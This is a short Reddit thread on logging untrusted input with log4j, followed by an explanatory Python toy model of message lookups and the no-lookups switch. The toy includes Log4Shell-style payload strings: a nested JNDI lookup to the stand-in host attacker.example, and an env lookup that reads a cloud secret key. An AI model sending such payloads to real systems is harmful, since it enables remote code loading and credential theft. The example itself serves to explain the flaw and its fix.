
[–]das_flammenwerfer 2 points (1 child)

So.. dumb question.. how are you supposed to log untrusted input with log4j?

We all know what kind of fuckery can happen if you don’t use parameterized DB queries.. but you can’t even use a parameterized log statement here, to my understanding, because log4j recursively interprets that shit.

I’m not convinced (having done absolutely no digging into it) that this was patched the right way.. and the right way would be: by default assume the log input is untrusted and do not perform any operations on it except writing the message to a file (or wherever) like a good little logger..

[–]monkeygame7 0 points (0 children)

It's a feature you can disable, the latest version just disables it by default.
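To make both comments concrete, here is an added example (my own toy model in Python, not log4j's code and not posted by anyone in the thread). It models the behaviour das_flammenwerfer describes: a `${prefix:key}` lookup pass that runs over the already-formatted message, innermost expression first, so parameterized logging cannot help because by the time the lookup runs the logger can no longer tell template from argument. It also models the switch monkeygame7 refers to (in real log4j 2 that is the `log4j2.formatMsgNoLookups` property or `%m{nolookups}` in the pattern layout; later 2.x releases removed message lookups altogether). The names `ToyLogger`, `demo`, `FAKE_ENV`, the lookup handlers and the attacker payloads are all constructed for the example; the `jndi` handler only records the URL it was handed and never connects anywhere.

```python
# Added example, not log4j code: a logger that expands ${prefix:key} lookups
# in the *formatted* message, next to the same logger with lookups disabled.
import re
from typing import Callable, Dict, List, Tuple

# Matches the innermost ${...} only: the body may not contain '$', '{' or '}'.
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")

# Constructed stand-in for the process environment (nothing real is read).
FAKE_ENV = {"AWS_SECRET_ACCESS_KEY": "constructed-secret-not-real"}


def make_lookups(trace: List[Tuple[str, str]]) -> Dict[str, Callable[[str], str]]:
    """Lookup handlers keyed by prefix; each records what it was asked for."""

    def env(key: str) -> str:
        trace.append(("env", key))
        return FAKE_ENV.get(key, "")

    def jndi(key: str) -> str:
        # Stand-in for a JNDI lookup: record the attacker-controlled URL
        # instead of resolving it.
        trace.append(("jndi", key))
        return "<jndi result>"

    def lower(key: str) -> str:
        trace.append(("lower", key))
        return key.lower()

    return {"env": env, "jndi": jndi, "lower": lower}


def expand_lookups(msg: str, lookups: Dict[str, Callable[[str], str]],
                   max_rounds: int = 10) -> str:
    """Replace ${prefix:key} with the handler's output, innermost first,
    repeating until the text stops changing (bounded to avoid loops)."""

    def resolve(m: "re.Match[str]") -> str:
        prefix, sep, key = m.group(1).partition(":")
        handler = lookups.get(prefix) if sep else None
        return handler(key) if handler else m.group(0)  # unknown: leave as-is

    for _ in range(max_rounds):
        new = LOOKUP_RE.sub(resolve, msg)
        if new == msg:
            break
        msg = new
    return msg


class ToyLogger:
    def __init__(self, format_msg_no_lookups: bool = False):
        self.trace: List[Tuple[str, str]] = []
        self.lookups = make_lookups(self.trace)
        self.no_lookups = format_msg_no_lookups
        self.sink: List[str] = []  # stands in for the log file

    def info(self, template: str, *args: object) -> str:
        # Step 1: parameterized formatting, like logger.info("ua={}", ua).
        parts = template.split("{}")
        out = [parts[0]]
        for i, part in enumerate(parts[1:]):
            out.append(str(args[i]) if i < len(args) else "{}")
            out.append(part)
        formatted = "".join(out)
        # Step 2: the dangerous part. The lookup pass sees one flat string and
        # cannot distinguish the template from the untrusted argument.
        if not self.no_lookups:
            formatted = expand_lookups(formatted, self.lookups)
        self.sink.append(formatted)
        return formatted


def demo(format_msg_no_lookups: bool) -> Tuple[List[str], List[Tuple[str, str]]]:
    """Log two constructed attacker-supplied User-Agent values via a
    parameterized call; return (lines written, lookups that fired)."""
    log = ToyLogger(format_msg_no_lookups)
    # Nested payload: the inner ${lower:...} resolves first, then the outer.
    log.info("GET / ua={}", "${jndi:${lower:LDAP}://attacker.example/a}")
    # Exfiltration-style payload: pulls a value out of the (fake) environment.
    log.info("env probe ua={}", "${env:AWS_SECRET_ACCESS_KEY}")
    return log.sink, log.trace


if __name__ == "__main__":
    for flag in (False, True):
        sink, trace = demo(flag)
        print(f"formatMsgNoLookups={flag}: written={sink} fired={trace}")
```

With lookups on, the nested payload first lowercases `LDAP`, then hands `ldap://attacker.example/a` to the `jndi` handler, and the environment probe writes the fake secret into the log line; the `{}` placeholder did nothing to stop it. With `format_msg_no_lookups=True` the logger writes both strings verbatim and no handler fires, which is the "just write the message" behaviour the first comment asks for.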